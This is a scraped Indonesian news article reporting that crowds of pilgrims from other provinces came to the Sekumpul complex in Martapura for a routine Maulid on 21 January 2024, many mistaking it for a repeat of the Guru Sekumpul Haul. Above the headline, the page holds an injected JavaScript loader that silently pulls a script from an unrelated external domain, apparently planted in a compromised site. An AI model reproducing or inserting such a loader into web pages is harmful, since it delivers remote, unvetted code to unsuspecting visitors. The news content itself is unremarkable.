(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Jemaah dari Luar Kalsel Kembali Padati Kompleks Sekumpul


KANALKALIMANTAN.COM, MARTAPURA – Kompleks pengajian Sekumpul Martapura, Kalimantan Selatan, kembali dipadati jemaah yang datang dalam kegiatan Maulid rutin malam Senin, pada Minggu (21/1/2024) petang.

Menurut informasi yang diterima, kegiatan pada malam Senin hari ini adalah kegiatan Maulid rutin malam Senin warga Komplek Sekumpul Martapura. Bukan kegiatan Haul ke-19 KH Muhammad Zaini bin Abdul Ghani (Guru Sekumpul) yang diadakan kali kedua.

Kendati demikian, pantauan kanalkalimantan.com, kebanyakan rombongan jemaah berjalan kaki dari arah Jalan A Yani menuju pusat Mushalla Ar-raudhah Sekumpul bak kegiatan Haul Guru Sekumpul yang telah diselenggarakan pada pekan sebelumnya atau Minggu (14/1/2024) kemarin.

Baca juga: BNPB: Banjir Terjadi di 1 Kota dan 5 Kabupaten di Kalteng

Jika dihitung, ada ribuan orang dari berbagai daerah yang terus berdatangan. Ada yang datang dari Banjarmasin, Kalimantan Tengah, bahkan dari Kalimantan Timur.

Seperti halnya ibu Muji, yang datang bersama rombongan majelis ta’limnya dari Balikpapan Kalimantan Timur.

“Kami sudah sejak kemarin datang, ada tiga rombongan yang datang naik bus, tapi busnya gak bisa masuk,” ungkap Muji yang datang bersama rombongan berjilbab hijau.

Baca juga: Pengedar Sabu di Paminggir Ditangkap, Kedapatan Simpan 75 Paket Sabu

Dia mengaku datang bersama tiga bus rombongan yang berisikan 10 orang setiap busnya. Dia pun mengaku berniat datang untuk mengikuti kegiatan Haul Ke-19 Abah Guru Sekumpul.

“Saat kegiatan haul minggu lalu kami berhalangan hadir dan mendengar kabarnya itu jika yang tidak sempat mengikuti haul tanggal 14, bisa datang di tanggal 21,” jelas dia.

Senada dengan muji, Siti Hajar bersama tujuh rombongan keluarganya mengaku datang dari Kabupaten Kotawaringin Kalimantan Tengah, untuk mengikuti Haul Ke-19 Guru Sekumpul di Musholla Ar-raudhah.

“Kami menginap di Martapura juga baru hari kemarin datang, karena katanya hari ini bisa mengikuti Haul untuk yang berhalangan hadir pada tanggal 14 kemarin,” sebut jemaah dari Kalteng, Siti Hajar.

Sementara itu, pantauan kanalkalimantan.com juga, kepada jemaah yang berdatangan itu para relawan tetap berjaga, mengarahkan dan menjelaskan bahwa kegiatan malam ini bukan lah kegiatan Haul Guru Sekumpul, melainkan kegiatan Maulid rutin malam Senin.

“Tidak ada haul dua kali, ini acara rutin biasa Maulid malam senin,” ucap Salman yang sedang mengatur shaf jemaah.

Seperti perkiraan, jemaah perempuan ikut hadir, oleh karenanya relawan kembali membuka dan mengarahkan agar jemaah perempuan memenuhi shaf-shaf yang disediakan di halaman rumah-rumah warga.

“Sebenarnya khusus malam Senin ini perempuan tidak diperbolehkan, namun kami sudah antisipasi jemaah yang terlanjur datang maka kami tetap buka shaf untuk jemaah perempuan di sebelah Mahabbah hingga ke belakang seperti di Gang Muhaimin,” jelas dia.

Selain mengatur jemaah, para relawan kembali berjaga mengatur arus lalu lintas hingga kantong parkir yang hanya disediakan di sekitaran kawasan Sekumpul.

Sejumlah relawan juga ikut membagikan makanan dna minuman gratis sebelum kegiatan dimulai.

“Insya Allah kita terus berjaga sampai besok pagi, karena melihat jemaah yang kembali banyak berdatangan,” tuntas menutup. (kanalkalimantan.com/wanda)

Reporter: wanda
Editor: Dhani


Muhammad Andi

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

11 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

11 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

11 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

11 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

11 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

12 jam ago

This website uses cookies.